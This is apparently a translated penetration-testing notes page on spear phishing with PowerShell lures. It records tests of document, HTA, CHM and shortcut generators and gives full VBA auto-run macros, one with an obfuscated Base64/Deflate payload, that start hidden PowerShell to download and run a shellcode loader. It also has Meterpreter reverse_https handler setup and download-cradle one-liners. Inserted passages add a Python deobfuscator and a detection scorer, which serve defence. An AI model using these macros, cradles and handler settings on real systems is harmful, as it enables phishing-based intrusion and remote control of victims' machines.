Spear Phishing with Powershell

Test environment

Windows 8.1
x64

Client module tests

Out-Word

Test failed: the Word document was not generated.

Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-HTA

Test failed: after running the HTA file, the shellcode did not execute.

Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-Excel

Test succeeded.

Out-Excel -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-Shortcut

Payload too long; test failed. It could be combined with certain shortcut-file vulnerabilities.

Out-Shortcut -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-CHM

Test failed: after opening the CHM file, the shellcode did not execute.

Out-CHM -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Tested again with a different HHCPath; still failed.

Out-CHM -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force" -HHCPath "E:\HTML Help Workshop"

Out-Java

Requires a JDKPath; the exploitation scenario seems limited, so the experiment was abandoned.

Out-Java -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-WebQuery

Not tested due to limitations of the test environment. If it works, it should be a fairly effective technique.

vbs script

See video [1], which provides a OneDrive download.

The PowerShell script here is also obfuscated.

Base64 encoded (with Deflate compression)

Sub AutoOpen()
Execute
End Sub
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('TZFda8IwFIbvB/sPh9KNhNnQdlM2y4StbEMYKquwC/EitgebWavYM1TU/76ktZ25ySG8H08SO84U5gTPMMCtM5z9YEwQ7QvCpRggiWgVL5AKMQ5HYalklvfkC6/zKDzhub7VetCLB3ZBG5RLnWNXieIDKSrPGA8msz3hZDq1zV5okStEp92+bx9vDu4p2KYqQ8ZsZexVkPhCmbBK3wK3BdUoPjGfU8o5ODmCyw+BnUiS2scu+J3xfo0DucT6JmPckXiJwn7/LY9Xicrn/Mynx7rFlChzE8yTmYwXJlThDqoGv3frwRGGv+RUNriQ+lCS18Y7sEYRWHpn623CxUhSag57YJ09utDET8iA4Zlp2u2WjCXbq2Fi/w3NE4vvjSJkTY7mbub6eRrte/ZbpIyfgvpXwmxVIOPXV38=')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();", Null, objConfig, intProcessID
End Function
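
The macro above wraps its PowerShell script in three layers: Base64, a .NET DeflateStream, and ASCII decoding. The following Python is an added example for analysts triaging such a macro; it is not code from the page or from any project named here. It reverses the same three layers and lists the download-cradle indicators found in the recovered script. .NET's DeflateStream emits a raw DEFLATE stream without a zlib header, so zlib must be told to use a negative window size. The sample blob is constructed from a benign stand-in script; the function applies unchanged to the blob in the macro above.

```python
import base64
import binascii
import zlib

# Added example (not from the page): undo [Convert]::FromBase64String ->
# IO.Compression.DeflateStream(Decompress) -> Text.Encoding.ASCII.
# DeflateStream writes raw DEFLATE (RFC 1951), hence wbits = -15.


def decode_deflate_b64(blob: str) -> str:
    """Reverse the Base64 + raw-Deflate + ASCII layering used by the macro."""
    try:
        raw = base64.b64decode(blob, validate=True)
        plain = zlib.decompress(raw, -15)
    except (binascii.Error, zlib.error) as exc:
        raise ValueError(f"blob is not Base64-wrapped raw DEFLATE: {exc}") from exc
    return plain.decode("ascii")


def encode_deflate_b64(text: str) -> str:
    """Produce the same layering; used here only to build a constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15 => raw DEFLATE, no header
    data = comp.compress(text.encode("ascii")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


# Substrings in a recovered script that warrant analyst attention.
INDICATORS = (
    "Invoke-Expression", "iex ", "DownloadString", "Net.WebClient",
    "FromBase64String", "ExecutionPolicy Bypass", "-WindowStyle Hidden",
)


def indicators_in(script: str) -> list:
    lower = script.lower()
    return [i for i in INDICATORS if i.lower() in lower]


def triage(blob: str) -> dict:
    """Decode a blob and report the script plus any indicators it contains."""
    script = decode_deflate_b64(blob)
    return {"script": script, "indicators": indicators_in(script)}


# Constructed sample (NOT the blob from the page): a benign stand-in script
# that carries exactly one download-cradle indicator.
SAMPLE_SCRIPT = "Write-Host 'constructed sample'; $c = New-Object Net.WebClient"
SAMPLE_BLOB = encode_deflate_b64(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = triage(SAMPLE_BLOB)
    print(result["script"])
    print("indicators:", result["indicators"])
```

Decoding in a sandbox rather than executing the macro is the point: the recovered script can be read and fed to detection content without ever running PowerShell.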

Unobfuscated version

For other ways of invoking PowerShell from VBS, see [3] and [4].

Sub Auto_Open()
Execute
End Sub
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force", Null, objConfig, intProcessID
End Function
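
Every lure tested in the Client module section above, and both macros in this section, end in the same place: powershell.exe started with -ExecutionPolicy Bypass and a download cradle (iex of DownloadString, or Invoke-Expression of a Base64/Deflate blob). The following Python is an added detection example, not code from the page or from any project it names. It scores constructed process-creation events (a made-up JSON schema, not a real Sysmon or EDR format) on parent process and command-line tokens. One detail worth noting: because the macro starts PowerShell through WMI Win32_Process.Create, the child lands under WmiPrvSE.exe rather than EXCEL.EXE, so a rule that only looks for an Office parent misses it; the scorer treats the WMI provider host as a suspicious parent in its own right. It also covers the other lure types from the page (mshta.exe for HTA, hh.exe for CHM, wscript.exe/cscript.exe for VBS).

```python
import json
import re
from dataclasses import dataclass, field

# Added example (not from the page): score process-creation events for the
# PowerShell download cradle used by every lure on this page. Event format is
# constructed JSON with Image / ParentImage / CommandLine keys.

# Parents matching the lure types tested above: Office macros, Out-HTA
# (mshta.exe), Out-CHM (hh.exe, the HTML Help viewer) and VBScript droppers.
LURE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                "mshta.exe", "hh.exe", "wscript.exe", "cscript.exe"}
# Win32_Process.Create spawns the child under the WMI provider host, so the
# macro above never shows EXCEL.EXE as PowerShell's parent.
WMI_PARENT = "wmiprvse.exe"
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# (reason, case-insensitive regex over the command line, weight)
CMDLINE_TOKENS = [
    ("execution policy bypass", r"-executionpolicy\s+bypass", 2),
    ("hidden window",           r"-windowstyle\s+hidden", 2),
    ("invoke-expression",       r"\b(iex|invoke-expression)\b", 3),
    ("downloadstring cradle",   r"downloadstring", 3),
    ("webclient",               r"net\.webclient", 2),
    ("base64 payload",          r"frombase64string", 2),
    ("deflate payload",         r"deflatestream", 2),
    ("noprofile",               r"-noprofile", 1),
]


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    return json.loads(line)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Verdict:
    """Weight parent-process context plus command-line tokens for one event."""
    v = Verdict()
    if basename(event.get("Image", "")) not in POWERSHELL:
        return v
    parent = basename(event.get("ParentImage", ""))
    if parent in LURE_PARENTS:
        v.score += 4
        v.reasons.append(f"parent {parent}")
    elif parent == WMI_PARENT:
        v.score += 3
        v.reasons.append("spawned via WMI Win32_Process.Create")
    cmd = event.get("CommandLine", "")
    for reason, pattern, weight in CMDLINE_TOKENS:
        if re.search(pattern, cmd, re.IGNORECASE):
            v.score += weight
            v.reasons.append(reason)
    return v


def alert(line: str, threshold: int = 6) -> bool:
    return score_event(parse_event(line)).score >= threshold


# Constructed sample events (paths, URL and blob are made up for this example).
SAMPLE_EVENTS = [
    # Excel macro -> powershell.exe with the DownloadString cradle
    r"""{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://example.invalid/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"}""",
    # Same macro started through WMI: parent is WmiPrvSE.exe, payload is Base64 + Deflate
    r"""{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('CONSTRUCTED_BLOB')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"}""",
    # Benign admin use of PowerShell from the desktop
    r"""{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"}""",
    # Not PowerShell at all
    r"""{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"}""",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        v = score_event(parse_event(line))
        print(v.score, alert(line), v.reasons)
```

The weights are illustrative; in production they would be tuned against the fleet's baseline of legitimate PowerShell use. The benign explorer.exe event scores 1 (only -NoProfile), while both lure events score 15.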

Invoke-Shellcode

Look in the git repository for an early version of Invoke-Shellcode; it should support the following usage (see video [2]):

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.100 -Lport 4444

Version change log; roll back to 142afad54ea82ea385c4d8262de6a532d3206080

commit 7f6d3a4565643e954970405817052f5cbe75836b
Author: Matt Graeber <mattgraeber@gmail.com>
Date: Mon Dec 14 11:02:14 2015 -0800

Fix Invoke-Shellcode OS architecture detection
Fixes issue #70

commit 5065810c071a7cdbe5bd28384d35f0b8a90cabeb
Author: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date: Thu Nov 5 10:31:40 2015 -0500

Removing Metasploit integration from Invoke-Shellcode
This should have only ever been a shellcode runner. Those wishing to
integrate this with Metasploit should generate a shellcode payload with
msfvenom.

commit d0fff7b6371ccb52952268f47ae68e85c3aeeb91
Author: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date: Wed Nov 4 14:56:46 2015 -0500

Migrating everything back to Invoke-Shellcode.ps1. I'm done making my point now. :P

diff --git a/CodeExecution/Invoke-Shellcode.ps1 b/CodeExecution/Invoke-Shellcode.ps1
index 6ca6def..87e2e84 100644
--- a/CodeExecution/Invoke-Shellcode.ps1
+++ b/CodeExecution/Invoke-Shellcode.ps1

commit 142afad54ea82ea385c4d8262de6a532d3206080
Author: mattifestation <mattgraeber@gmail.com>
Date: Tue Feb 3 21:47:05 2015 -0500

Added parameters back to the original Invoke-Shellcode

Server-side configuration when using Meterpreter shellcode

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 121.121.123.198
set LPORT 4444
set ExitOnSession false
exploit -j

About Lhost and Rhost

Lhost generally refers to the IP of the controlling (listener) side; Rhost generally refers to the IP of the controlled (target) host.

Controlling an internal-network host from the Internet

Use a server with a public IP, or configure port mapping on the router.

Powershell Script

Example 1

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force

Example 2

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 121.121.121.21 -Lport 4444 -Force

WPS phishing

See CVE-2013-3934. WPS 2012 is affected, but it should already be fixed in WPS 2016. There is also an earlier CVE-2012-4886, which by all appearances was fixed long ago.

Further plans regarding shellcode

http://drops.wooyun.org/papers/4751
http://drops.wooyun.org/tips/4413
http://www.freebuf.com/news/special/60758.html

References

[1] PowerSploit controlando Windows 8.1 Pro con MACRO de Excel
[2] PowerShell Toolkit: PowerSploit - Gaining Shells Without Writing To Disk
[3] How to Use VBScript to Run a PowerShell Script
[4] Running Powershell from vbs with command as parameter
[5] WPS Phishing
[6] PowerShell internal-network penetration examples (POWERSHELL内网渗透实例)